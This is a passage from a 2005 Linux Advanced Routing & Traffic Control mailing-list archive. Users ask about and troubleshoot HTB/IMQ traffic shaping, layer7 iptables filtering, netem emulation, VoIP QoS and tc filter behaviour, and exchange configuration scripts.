is it necessary to attach a leaf sfq or pfifo class to make things work? i guess no, it's just used to give fairness to each connections sent to the class, right?) I can also se the filters that use "mark" policy go directly to the root class. I did not understand exactly why filters are attached to the root qdisc, and not to the qdisc they refer too, but i guess it's a correct behavious as i see it in every script around... i'll try to see if i can understand alittle more with the traffic graphs too.. Thanks again, Ricky -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFB8rF6wfVi6Z6cQK8RAsg2AJ46TBdg0lDMlRNOUByF4zjlsVlcKgCguVOI bZ1kpiUVVh8rbXBnseNBAq8= =X6Mx -----END PGP SIGNATURE----- From register@flintz.de Sat Jan 22 20:58:52 2005 From: register@flintz.de (FB) Date: Sat, 22 Jan 2005 21:58:52 +0100 Subject: [LARTC] Layer 7 packet classifier doesn't recognize packets sent by the router itself Message-ID: <41F2BE8C.9050101@flintz.de> Hi there, I have a little problem. I had this some months ago but didn't solve it back then. I have patched my kernel with Layer 7 support and patched my iptables to support it, too. Now I inserted this line in my firewall script on my router for testing purpose: $IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp -m layer7 --l7proto http -j DROP It works, BUT only if the connection is established by a pc BEHIND the router (the connection is blocked). If I try to establish a http connection from the router itself it works completely (layer 7 is NOT working, the connection is working, thats what I wanted to say *g*. Now I changed the line above to this: $IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp --dport 80 -j DROP and see, it works in BOTH cases. But thats no solution as I need Layer 7 also for router-connections. I also tried ftp als layer7 protocol, same thing. Anyone has an idea why this is happening? Thanks in advance. -FB From iavramop@Princeton.EDU Sun Jan 23 05:22:09 2005 From: iavramop@Princeton.EDU (Ioannis C Avramopoulos (iavramop@Princeton.EDU)) Date: Sun, 23 Jan 2005 00:22:09 -0500 Subject: [LARTC] Determing the pfifo backlog Message-ID: <3d41a0ab2ae2.41f2ee31@Princeton.EDU> Greetings -- in the "Linux Advanced Routing & Traffic Control HOWTO" chapter 14.1 on bfifo/pfifo it says that: "you can use this qdisc to determine the backlog on your interface". But it does not say exactly how. Command [#tc -s qdisc ls] outputs the number of packets sent so far but it does not output any info about the backlog. My first question is whether a command exists that provides info about the backlog. My second question is whether a system call exists that provides this info. I would like to be able to query on the backlog at real time and invoking the shell on each such query sounds like a lot of overhead. Kind regards, Yannis From vincent-perrier@club-internet.fr Sun Jan 23 08:26:55 2005 From: vincent-perrier@club-internet.fr (vincent perrier) Date: Sun, 23 Jan 2005 09:26:55 +0100 Subject: [LARTC] Determing the pfifo backlog In-Reply-To: <3d41a0ab2ae2.41f2ee31@Princeton.EDU> References: <3d41a0ab2ae2.41f2ee31@Princeton.EDU> Message-ID: <1106468815.5703.6.camel@localhost.localdomain> > My first question is whether a command exists that provides info > about the backlog. > > My second question is whether a system call exists that provides this > info. I would like to be able to query on the backlog at real time > and invoking the shell on each such query sounds like a lot of overhead. If you can compile a modified kernel, you can have real time access to the red qdisc backlog by using the soft at http://www.rawsoft.org I also think that real time info on the queues are very important and should be accessible in an easier way. From George Alexandru Dragoi Sun Jan 23 08:31:48 2005 From: George Alexandru Dragoi (George Alexandru Dragoi) Date: Sun, 23 Jan 2005 10:31:48 +0200 Subject: [LARTC] Layer 7 packet classifier doesn't recognize packets sent by the router itself In-Reply-To: <41F2BE8C.9050101@flintz.de> References: <41F2BE8C.9050101@flintz.de> Message-ID: <3063e50501230031234731e8@mail.gmail.com> Try this iptables -t mangle -N local iptablts -t mangle -A INPUT -i $INET_IFACE -j local iptables -t mangle -A OUTPUT -o $INET_IFACE -j local iptables -t mangle -A local -p tcp -m layer7 --l7proto http -j DROP I only think it may work, i say this because local packets are passing INPUT and OUTPUT, while routed packets will always pass POSTROUTING (and l7-filter need to make a match both ways: incoming and outgoing packets) On Sat, 22 Jan 2005 21:58:52 +0100, FB wrote: > Hi there, > > I have a little problem. I had this some months ago but didn't solve it > back then. I have patched my kernel with Layer 7 support and patched my > iptables to support it, too. > Now I inserted this line in my firewall script on my router for testing > purpose: > > $IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp -m layer7 > --l7proto http -j DROP > > It works, BUT only if the connection is established by a pc BEHIND the > router (the connection is blocked). If I try to establish a http > connection from the router itself it works completely (layer 7 is NOT > working, the connection is working, thats what I wanted to say *g*. > Now I changed the line above to this: > > $IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp --dport 80 -j > DROP > > and see, it works in BOTH cases. But thats no solution as I need Layer 7 > also for router-connections. I also tried ftp als layer7 protocol, same > thing. > > Anyone has an idea why this is happening? > > Thanks in advance. > > -FB > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > -- Bla bla From gspiliot@yahoo.com Sun Jan 23 14:14:35 2005 From: gspiliot@yahoo.com (George Spiliotis) Date: Sun, 23 Jan 2005 06:14:35 -0800 (PST) Subject: [LARTC] Shaping traffic with high priority hosts Message-ID: <20050123141435.68417.qmail@web50409.mail.yahoo.com> Dear all My current setup is the following: Normal Hosts --------+ eth0 eth1 | +----------+ +-<->| F/W box |--<-> Internet | +----------+ High priority hosts--+ My eth0 is a normal 100MBps LAN and my Internet connection is a 1Mbps ADSL line. What I want to achieve is to have normal hosts to share a big part of the internet connection (say 700-800KBps) and have my bosses (the High priority hosts) to 'feel' a snappy internet access WHEN they actually decide to use the internet. The ideal situation will be to slow down all normal hosts' traffic in order to serve our boss PCs only. First of all what is the best way to limit the Internet line usage for the normal hosts? I.e. the summary of all the normal hosts' traffic from the Internet towards the internal LAN should not exceed 700-800KBps. If I put traffic control for eth0 (lan side) then, presumably, I only limit the speed with which the packets leave the eth0 interface from the F/W. The speed of the actual download will be 1Mbps till the internal queues of the F/W for eth0 fill up plus the queues at my ISP fill up as well (way too much)... Is it better to use IMQ? Then when one of my boss PCs generates a HTTP request I need to put that request in front of all other packets in the eth1 queue at the F/W to get it quickly out to the internet and then I need to make sure that the requested info will quickly enter my F/W from the internet and reach my boss PC (i.e. minimal queueing at the ISP+fast delivery from the F/W). In other words when the priority hosts start requesting traffic from the internet I don't care for the normal hosts's traffic. Any ideas on how to accomplish this? Any glues on tc planning and setup? Any examples? Thank you in advanced, George __________________________________ Do you Yahoo!? Yahoo! Mail - 250MB free storage. Do more. Manage less. http://info.mail.yahoo.com/mail_250 From nug@sch.bme.hu Sun Jan 23 16:10:59 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Sun, 23 Jan 2005 17:10:59 +0100 Subject: [LARTC] Shaping traffic with high priority hosts In-Reply-To: <20050123141435.68417.qmail@web50409.mail.yahoo.com> References: <20050123141435.68417.qmail@web50409.mail.yahoo.com> Message-ID: <41F3CC93.4070905@sch.bme.hu> Hi! George Spiliotis wrote: > Dear all > > My current setup is the following: > > Normal Hosts --------+ eth0 eth1 > | +----------+ > +-<->| F/W box |--<-> Internet > | +----------+ > High priority hosts--+ Your questions are very typical. It can be easily accomplished using HTB on interface eth0. You do not need IMQ. There are numerous sites dealing with this problem. For example: http://luxik.cdi.cz/~devik/qos/htb/ http://www.knowplace.org/shaper/ Go and read them. -- Udv, Nandor From riccardo@e4a.it Sun Jan 23 20:54:53 2005 From: riccardo@e4a.it (Riccardo Losselli) Date: Sun, 23 Jan 2005 21:54:53 +0100 Subject: [LARTC] Info about VoiP Qos In-Reply-To: <200501221311.32569.jasonb@edseek.com> References: <41F28A25.1030108@e4a.it> <200501221311.32569.jasonb@edseek.com> Message-ID: <41F40F1D.6030507@e4a.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Thanks again to Jason.. i plotted the classes and they are as i wished them to be.. I also plotted the traffic, while heavily using the link. I gave Voip a 100Kbit rate (it need between 80 and 90some) and it worked. There are no visibile spikes (traffic si not exactly flat, but variations are minimal) and stay betwen 80Kbps and 90some. So it should be fine.. traffic is prioritarized, prio 1, while the other traffic is 3 or more.. Leaf classes are sfq perturb 10 I still hear the pops.. If it can be a useful hint, the problem appears only when i'm called, not when i call (i use two diffent servers when making calls and receiving). The only one who hears the pops i the one on the POTS phone that is calling me, i do not hear any pop (but i guess it's because my link is saturated upstream only) At first i thought that it was a problem of the server used to call me. but if I the almost zero the non voip traffic the pops disappear... Will test more... Bye, Ricky -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFB9A8dwfVi6Z6cQK8RAmg2AJ9Wa7bonOslMsRm6sInLrKA438gHgCdFcge cYm/fGsXo7XJ5KkHLXD+Mo0= =FzbA -----END PGP SIGNATURE----- From alaios@yahoo.com Mon Jan 24 10:53:36 2005 From: alaios@yahoo.com (Alaios) Date: Mon, 24 Jan 2005 02:53:36 -0800 (PST) Subject: [LARTC] greb + htb debug Message-ID: <20050124105336.54049.qmail@web54705.mail.yahoo.com> Good morning i want to enable some debug messages concering htb and gred. The reason is that i want to see the journey of the ip packet through the 2.6 kernel from the start to finish (ethernet interface up to htb and gred classification). In the sch_htc.c i have found the following /* debugging support; S is subsystem, these are defined: 0 - netlink messages 1 - enqueue 2 - drop & requeue 3 - dequeue main 4 - dequeue one prio DRR part 5 - dequeue class accounting 6 - class overlimit status computation 7 - hint tree 8 - event queue 10 - rate estimator 11 - classifier 12 - fast dequeue cache L is level; 0 = none, 1 = basic info, 2 = detailed, 3 = full q->debug uint32 contains 16 2-bit fields one for subsystem starting from LSB */ #ifdef HTB_DEBUG #define HTB_DBG_COND(S,L) (((q->debug>>(2*S))&3) >= L) #define HTB_DBG(S,L,FMT,ARG...) if (HTB_DBG_COND(S,L)) \ but still i don't know what should i change in order to see debug messages in my dmesg... Also in the same file the following line exists #define HTB_DEBUG 1 /* compile debugging support (activated by tc tool) */ Do u know how i can use tc tool for viewing that debug messages? Thx a lot __________________________________ Do you Yahoo!? Yahoo! Mail - Find what you need with new enhanced search. http://info.mail.yahoo.com/mail_250 From alg0@iit.demokritos.gr Mon Jan 24 12:02:08 2005 From: alg0@iit.demokritos.gr (Antonios Chalkiopoulos) Date: Mon, 24 Jan 2005 14:02:08 +0200 Subject: [LARTC] tc filter change/replace In-Reply-To: <20050123060247.15951.84291.Mailman@outpost.ds9a.nl> References: <20050123060247.15951.84291.Mailman@outpost.ds9a.nl> Message-ID: <200501241402.08307.alg0@iit.demokritos.gr> I am wondering whether the commands 'tc filter change' and 'tc filter replace' are working. Googling around revealed a few emails on the LARTC stating that unfoirtunately they do not work. A quick check showed that they are still not implemented (properly). Some propose a solution to build a second tree of filters and apply the 2nd one when a need for it arises. Howver how can someone achive the above trick. Any answer is welcomew. Thanks, Antonio & Alex From ixen2@o2.pl Mon Jan 24 14:08:57 2005 From: ixen2@o2.pl (Ixen Gerthannes) Date: Mon, 24 Jan 2005 15:08:57 +0100 Subject: [LARTC] Htb, imq and sfq traffic shaping Message-ID: <20050124150857.7d530d34@drak.aard.net> Hello, I wrote a simple traffic shaping script (below) that should have allowed me to shape my internet traffic a bit (ppp0 - adsl 128kbit/64kbit; local interface eth0). The script works only partially - the speed is being limited but too much. Without running this script my download rate is about 10kBytes (with second computer also downloading at about 6kBytes). After running it my download speed decreases to about 1..2kBytes and so the second computer. Could you tell me what have I done wrong ? Thank you for replies. Ixen -------------- My configuration: Celeron 450MHz, 256MB RAM Kernel 2.6.9 patched for imq support (imq devices compiled into kernel) iptables 1.2.11 (also patched for imq) Script: #!/bin/sh DOWNIF='imq0' UPIF='imq1' rc_done=" done" rc_failed=" failed" TC='/sbin/tc' IPTABLES='/usr/sbin/iptables' IFCONFIG='/sbin/ifconfig' MODPROBE='/sbin/modprobe' return=$rc_done tc_reset () { # remove old devices if any echo "Removing old root qdisc..." $TC qdisc del dev $DOWNIF root $TC qdisc del dev $UPIF root } tc_status () { echo "========================================" echo "[qdisc - $DOWNIF]" $TC -s qdisc show dev $DOWNIF echo "[qdisc - $UPIF]" $TC -s qdisc show dev $UPIF echo "----------------------------------------" echo echo "[class - $DOWNIF]" $TC -s class show dev $DOWNIF echo "[class - $UPIF]" $TC -s class show dev $UPIF } tc_showfilter () { echo "[filter - $DOWNIF]" $TC -s filter show dev $DOWNIF echo "[filter - $UPIF]" $TC -s filter show dev $UPIF } case "$1" in start) echo "Starting traffic shaping..." tc_reset # setup imq devices - imq0 for download, imq1 for upload # $MODPROBE imq numdevs 2 $IFCONFIG imq0 up $IFCONFIG imq1 up # ROOT DEVICE echo " Setting root devices for $DOWNIF and $UPIF" # download $TC qdisc add dev $DOWNIF root handle 1: htb default 99 $TC qdisc add dev $DOWNIF parent 1: classid 1:10 htb rate 128kbit # upload $TC qdisc add dev $UPIF root handle 1: htb default 98 $TC class add dev $UPIF parent 1: classid 1:20 htb rate 64kbit # ADDRESSES echo " 192.168.0.30" # 192.168.0.30 $TC class add dev $DOWNIF parent 1:10 classid 1:1000 htb rate 48kbit ceil 128kbit $TC qdisc add dev $DOWNIF parent 1:1000 handle 1000 sfq $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1000 fw classid 1:1000 $TC class add dev $UPIF parent 1:20 classid 1:2000 htb rate 24kbit ceil 64kbit $TC qdisc add dev $UPIF parent 1:2000 handle 2000 sfq $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2000 fw classid 1:2000 $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.30 -j MARK --set-mark 1000 $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.30 -j MARK --set-mark 2000 # 192.168.0.178 echo " 192.168.0.178" $TC class add dev $DOWNIF parent 1:10 classid 1:1010 htb rate 16kbit ceil 100kbit $TC qdisc add dev $DOWNIF parent 1:1010 handle 1010 sfq $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1010 fw classid 1:1010 $TC class add dev $UPIF parent 1:20 classid 1:2010 htb rate 8kbit ceil 60kbit $TC qdisc add dev $UPIF parent 1:2010 handle 2010 sfq $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2010 fw classid 1:2010 $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.178 -j MARK --set-mark 1010 $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.178 -j MARK --set-mark 2010 # 192.168.0.55 echo " 192.168.0.55" $TC class add dev $DOWNIF parent 1:10 classid 1:1020 htb rate 16kbit ceil 100kbit $TC qdisc add dev $DOWNIF parent 1:1020 handle 1020 sfq $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1020 fw classid 1:1020 $TC class add dev $UPIF parent 1:20 classid 1:2020 htb rate 8kbit ceil 60kbit $TC qdisc add dev $UPIF parent 1:2020 handle 2020 sfq $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2020 fw classid 1:2020 $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.55 -j MARK --set-mark 1020 $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.55 -j MARK --set-mark 2020 # other echo " other..." $TC class add dev $DOWNIF parent 1:10 classid 1:99 htb rate 100bit ceil 8kbit $TC class add dev $UPIF parent 1:20 classid 1:98 htb rate 100bit ceil 8kbit # route traffic echo " Traffic redirecting" # download $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.0/24 -j IMQ --todev 0 #upload $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.0/24 -j IMQ --todev 1 tc_status ;; stop) echo -n "Stopping traffic shaper..." tc_reset || return=$rc_failed echo -e "$return" ;; restart|reload) $0 stop && $0 start || return=$rc_failed ;; stats|status) tc_status ;; filter) tc_showfilter ;; *) echo "Usage: $0 {start|stop|restart|stats|filter}" esac From George Alexandru Dragoi Mon Jan 24 17:26:24 2005 From: George Alexandru Dragoi (George Alexandru Dragoi) Date: Mon, 24 Jan 2005 19:26:24 +0200 Subject: [LARTC] Htb, imq and sfq traffic shaping In-Reply-To: <20050124150857.7d530d34@drak.aard.net> References: <20050124150857.7d530d34@drak.aard.net> Message-ID: <3063e505012409264f31331d@mail.gmail.com> I didn't look much on your script (my brain is not that good compiler), but looking at yoour default classes and what is happening with you, i think the filters are not working on you, and evetything go to default classes. If so, removing the default classes will make everything work at maximum speed. On Mon, 24 Jan 2005 15:08:57 +0100, Ixen Gerthannes wrote: > Hello, > I wrote a simple traffic shaping script (below) that should have allowed me to shape my internet traffic a bit (ppp0 - adsl 128kbit/64kbit; local interface eth0). > The script works only partially - the speed is being limited but too much. Without running this script my download rate is about 10kBytes (with second computer also downloading at about 6kBytes). After running it my download speed decreases to about 1..2kBytes and so the second computer. > Could you tell me what have I done wrong ? > > Thank you for replies. > Ixen > > -------------- > My configuration: > Celeron 450MHz, 256MB RAM > Kernel 2.6.9 patched for imq support (imq devices compiled into kernel) > iptables 1.2.11 (also patched for imq) > > Script: > #!/bin/sh > > DOWNIF='imq0' > UPIF='imq1' > rc_done=" done" > rc_failed=" failed" > > TC='/sbin/tc' > IPTABLES='/usr/sbin/iptables' > IFCONFIG='/sbin/ifconfig' > MODPROBE='/sbin/modprobe' > > return=$rc_done > > tc_reset () > { > # remove old devices if any > echo "Removing old root qdisc..." > $TC qdisc del dev $DOWNIF root > $TC qdisc del dev $UPIF root > } > > tc_status () > { > echo "========================================" > echo "[qdisc - $DOWNIF]" > $TC -s qdisc show dev $DOWNIF > echo "[qdisc - $UPIF]" > $TC -s qdisc show dev $UPIF > echo "----------------------------------------" > echo > echo "[class - $DOWNIF]" > $TC -s class show dev $DOWNIF > echo "[class - $UPIF]" > $TC -s class show dev $UPIF > } > > tc_showfilter () > { > echo "[filter - $DOWNIF]" > $TC -s filter show dev $DOWNIF > echo "[filter - $UPIF]" > $TC -s filter show dev $UPIF > } > > case "$1" in > > start) > echo "Starting traffic shaping..." > tc_reset > > # setup imq devices - imq0 for download, imq1 for upload > # $MODPROBE imq numdevs 2 > > $IFCONFIG imq0 up > $IFCONFIG imq1 up > > # ROOT DEVICE > echo " Setting root devices for $DOWNIF and $UPIF" > > # download > $TC qdisc add dev $DOWNIF root handle 1: htb default 99 > $TC qdisc add dev $DOWNIF parent 1: classid 1:10 htb rate 128kbit > # upload > $TC qdisc add dev $UPIF root handle 1: htb default 98 > $TC class add dev $UPIF parent 1: classid 1:20 htb rate 64kbit > > # ADDRESSES > echo " 192.168.0.30" > # 192.168.0.30 > $TC class add dev $DOWNIF parent 1:10 classid 1:1000 htb rate 48kbit ceil 128kbit > $TC qdisc add dev $DOWNIF parent 1:1000 handle 1000 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1000 fw classid 1:1000 > > $TC class add dev $UPIF parent 1:20 classid 1:2000 htb rate 24kbit ceil 64kbit > $TC qdisc add dev $UPIF parent 1:2000 handle 2000 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2000 fw classid 1:2000 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.30 -j MARK --set-mark 1000 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.30 -j MARK --set-mark 2000 > > # 192.168.0.178 > echo " 192.168.0.178" > $TC class add dev $DOWNIF parent 1:10 classid 1:1010 htb rate 16kbit ceil 100kbit > $TC qdisc add dev $DOWNIF parent 1:1010 handle 1010 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1010 fw classid 1:1010 > > $TC class add dev $UPIF parent 1:20 classid 1:2010 htb rate 8kbit ceil 60kbit > $TC qdisc add dev $UPIF parent 1:2010 handle 2010 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2010 fw classid 1:2010 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.178 -j MARK --set-mark 1010 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.178 -j MARK --set-mark 2010 > > # 192.168.0.55 > echo " 192.168.0.55" > $TC class add dev $DOWNIF parent 1:10 classid 1:1020 htb rate 16kbit ceil 100kbit > $TC qdisc add dev $DOWNIF parent 1:1020 handle 1020 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1020 fw classid 1:1020 > > $TC class add dev $UPIF parent 1:20 classid 1:2020 htb rate 8kbit ceil 60kbit > $TC qdisc add dev $UPIF parent 1:2020 handle 2020 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2020 fw classid 1:2020 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.55 -j MARK --set-mark 1020 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.55 -j MARK --set-mark 2020 > > # other > echo " other..." > $TC class add dev $DOWNIF parent 1:10 classid 1:99 htb rate 100bit ceil 8kbit > $TC class add dev $UPIF parent 1:20 classid 1:98 htb rate 100bit ceil 8kbit > > # route traffic > echo " Traffic redirecting" > # download > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.0/24 -j IMQ --todev 0 > #upload > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.0/24 -j IMQ --todev 1 > > tc_status > ;; > > stop) > echo -n "Stopping traffic shaper..." > tc_reset || return=$rc_failed > echo -e "$return" > ;; > > restart|reload) > $0 stop && $0 start || return=$rc_failed > ;; > > stats|status) > tc_status > ;; > > filter) > tc_showfilter > ;; > > *) > echo "Usage: $0 {start|stop|restart|stats|filter}" > esac > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > -- Bla bla From shemminger@osdl.org Mon Jan 24 17:59:28 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Mon, 24 Jan 2005 09:59:28 -0800 Subject: [LARTC] network emulation In-Reply-To: <20050122134619.18266.qmail@web50407.mail.yahoo.com> References: <20050122134619.18266.qmail@web50407.mail.yahoo.com> Message-ID: <20050124095928.14887106@dxpl.pdx.osdl.net> On Sat, 22 Jan 2005 05:46:19 -0800 (PST) vinay mathew wrote: > hi, > I am really a newbie in linux traffic control.But i have task to implement a tool similar to > the nistnet tool used for netwok emulation tests but which emulates a wireless environment. > I was exploring the use of the traffic control subsystem for this task.In this regard i have > a few questions i need to post in order to clarify my thoughts on how to do this.I am using > tcng to classify traffic and generate the commands necessary to set up the traffic control > structures. > > 1. A simple task to add say a delay of 10ms to packets goin to a particular destination.I > tried this using a simple fifo queue and a tbf queue but was not able to obtain the required > results.The queue parameters dont have an explicit delay/latency parameter so basically i > want to know how to add a delay/latency to packets goin out thro a particular interface. > A simple script that i tried Use netem (http://developer.osdl.org/shemminger/netem) it is already in 2.6.8 > > 2.The second part is similar to the first but involves dropping a percentage of packets > instead of adding a delay to them.Example i need a 10% packet drop for packets coming from > source 1 and heading to dest 2. Example i use a simple fifo queue with a limit of 2 kB in > order to just test random drop capability.When i use the ping utility with a packet size > greater than 2kB i get the message that 0 packets sent and 0 packets received and when the > packet sizes are < 2048 bytes then there is no drop or delay at all.Ne ideas on this one. ditto > 3.To implement bandwidth sharing among different hosts.Example 4 hosts are communicating to each other and all traffic between them is routed through a router which is like the > bottleneck and acts as the wireless network environment with the bottleneck capacity as the > known wireless link capacity.I was thinking and am currently trying this using the HTB > queuing discipline.I wanted to know if this idea can be effectively implemented using the > HTB queuing discipline. > > Also im having some problems with installation and working of tcng on my Suse 9.2 system > which is running with a 2.6.8 kernel version.Ok the simulator could not be compiled. But > when i tried using the commands generated by the tcng compiler i get the error that dsmark > queuing discipline is not supported.However when i use the root keyword using the tc tool there seems to be no problem.I read that root and dsmark are the same ...or am i wrong about this. Also my kernel has all the parameters enabled for QoS support.I tried compiling iproute2 from source but im not able to since im getting errors while compiling.Can neone throw some light on this.Or is it that there are some compatibility problems with the newer 2.6 kernels. > Im sorry for the long content of the mail.But im a newbie and want to get my thoughts rite > on this and whether its possible.Thanx a million in advance. > regards > vinay Tcng depends on tclsim as part of the build process but it doesn't seem to build on 2.6. > __________________________________________________ > Do You Yahoo!? > Tired of spam? Yahoo! Mail has the best spam protection around > http://mail.yahoo.com -- Stephen Hemminger From register@flintz.de Mon Jan 24 18:45:52 2005 From: register@flintz.de (FB) Date: Mon, 24 Jan 2005 19:45:52 +0100 Subject: [LARTC] Layer 7 packet classifier doesn't recognize packets sent by the router itself In-Reply-To: <3063e50501230031234731e8@mail.gmail.com> References: <41F2BE8C.9050101@flintz.de> <3063e50501230031234731e8@mail.gmail.com> Message-ID: <41F54260.9010601@flintz.de> Thanks! Now it works :) But I have another little problem: I need 2(3) different chains (one for traffic only from the router (done by this chain), one for the complete traffic generatet from router AND computers behind the router and one for connections only established from computers behind the router). Any ideas how to accomplish that? -FB George Alexandru Dragoi wrote: > Try this > iptables -t mangle -N local > > iptablts -t mangle -A INPUT -i $INET_IFACE -j local > iptables -t mangle -A OUTPUT -o $INET_IFACE -j local > > iptables -t mangle -A local -p tcp -m layer7 --l7proto http -j DROP > > I only think it may work, i say this because local packets are passing > INPUT and OUTPUT, while routed packets will always pass POSTROUTING > (and l7-filter need to make a match both ways: incoming and outgoing > packets) From tgraf@suug.ch Mon Jan 24 19:24:47 2005 From: tgraf@suug.ch (Thomas Graf) Date: Mon, 24 Jan 2005 20:24:47 +0100 Subject: [LARTC] tc filter change/replace In-Reply-To: <200501241402.08307.alg0@iit.demokritos.gr> References: <20050123060247.15951.84291.Mailman@outpost.ds9a.nl> <200501241402.08307.alg0@iit.demokritos.gr> Message-ID: <20050124192447.GW23931@postel.suug.ch> * Antonios Chalkiopoulos <200501241402.08307.alg0@iit.demokritos.gr> 2005-01-24 14:02 > > I am wondering whether the commands 'tc filter change' and 'tc filter replace' > are working. Googling around revealed a few emails on the LARTC stating that > unfoirtunately they do not work. A quick check showed that they are still not > implemented (properly). > Some propose a solution to build a second tree of filters and apply the 2nd > one when a need for it arises. Howver how can someone achive the above trick. All classifiers except rsvp are changeable in the latest bk. The patchset has gone in around rc1-bk3-5. From lists@wildgooses.com Mon Jan 24 22:32:11 2005 From: lists@wildgooses.com (Ed Wildgoose) Date: Mon, 24 Jan 2005 22:32:11 +0000 Subject: [LARTC] Info about VoiP Qos In-Reply-To: <41F28A25.1030108@e4a.it> References: <41F28A25.1030108@e4a.it> Message-ID: <41F5776B.3070000@wildgooses.com> > But i would like to have the possibility to use all the 400Kbps and slow > down server traffic only when and if needed. > > I prioritized VoIP traffic, using the various scripts around, and what i > get is that, even if voip quality is definitely much much better than > without shaping, there are is still statics and pops, and some > interruption of the voice and only if i'm called from POTS > I do not get this when completely reserving the bandwith or when the > link is not loaded. You probably forgot to tweak the HTB code to change the hysterisis value? This helps a lot with the output stuff. However, remember that you always have to slow down the incoming to a little less than max otherwise by the time the stuff is throttled you see some small amount of queuing at the remote end. Also remember that the bandwidth of most adsl links is less than the stated bandwidth. This is because of ATM overheads (which vary depending on packet size) and also because the link is contended. Put this all together and you should be able to get pretty close to maximum,. perhaps only reserving a small amount of bandwidth and make the rest shareable. Good luck Ed W From shemminger@osdl.org Tue Jan 25 00:27:41 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Mon, 24 Jan 2005 16:27:41 -0800 Subject: [LARTC] [ANNOUNCE] iproute2 (050124) release Message-ID: <20050124162741.41606e3f@dxpl.pdx.osdl.net> Thanks to the work of Jamal and Thomas; here is an update to iproute2. http://developer.osdl.org/dev/iproute2/download/iproute2-2.6.10-ss050124.tar.gz Changes since last version: [Yun Mao] fix typo in ss [Thomas Graf] tc pedit/action cleanups add addraw_l rtattr_parse cleanups [Jamal Hadi Salim] typo in m_mirred add support for pedit [Jim Gifford] Fix allocation size error in nomal and paretonormal generation programs. -- Stephen Hemminger From riccardo@e4a.it Tue Jan 25 09:47:57 2005 From: riccardo@e4a.it (Riccardo Losselli) Date: Tue, 25 Jan 2005 10:47:57 +0100 Subject: [LARTC] Info about VoiP Qos In-Reply-To: <41F58FE9.7050505@wildgooses.com> References: <41F28A25.1030108@e4a.it> <41F5776B.3070000@wildgooses.com> <41F579FD.9000000@e4a.it> <41F58FE9.7050505@wildgooses.com> Message-ID: <41F615CD.4040803@e4a.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Ed Wildgoose wrote: | Please reply onlist in general | Sorry, i didn't notice the answer went to you only.. i did the same mistake with Jason. | Check the HTB code in iproute and look for the "hysteris" variable. | Basically it just lets a couple of packets burst out at the same time | instead of doinga very granular per packet throttling. ok.. | Find out what the protocol is on the line. ADSL for example uses ATM to | encapsulate each packet. YOu buy 512Kbs of ATM bandwidth, which | actually works out as somewhat less TCP bandwidth (which is what you are | throttling). So do some speed tests on the line and work out the REAL | speed of the line. Preferably use small packets since the overhead of | encapsulation often shoots up then. | | This might not be relevant though - just a warning though I understand it's a frame relay | I meant, reserve (say) 10Kbs, and only share the rest... I see.. this way it works. Things are getting a little more complicated though.. I tested with some people, calling ip to ip, and it works just fine. I understand that, if it's just a matter of my bandwith being overloaded and not correctly shaped i should get the same disturbs, but i do not. I suspect there is something involved on the server that converts the call from ip to POTS and vice versa too.. Thanks! Ricky -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFB9hXNwfVi6Z6cQK8RAoMNAJ9p8OJ1amuS+y0VKVla/CTZRwuwugCfT3xK rMU221VkLji/lhh3t4xXbKk= =JZ5A -----END PGP SIGNATURE----- From alaios@yahoo.com Tue Jan 25 11:02:31 2005 From: alaios@yahoo.com (Alaios) Date: Tue, 25 Jan 2005 03:02:31 -0800 (PST) Subject: [LARTC] tc filter change/replace In-Reply-To: <20050124192447.GW23931@postel.suug.ch> Message-ID: <20050125110231.58598.qmail@web54701.mail.yahoo.com> Tomas Graf: You mentioned that "All classifier except rsvp are changeable in the latest 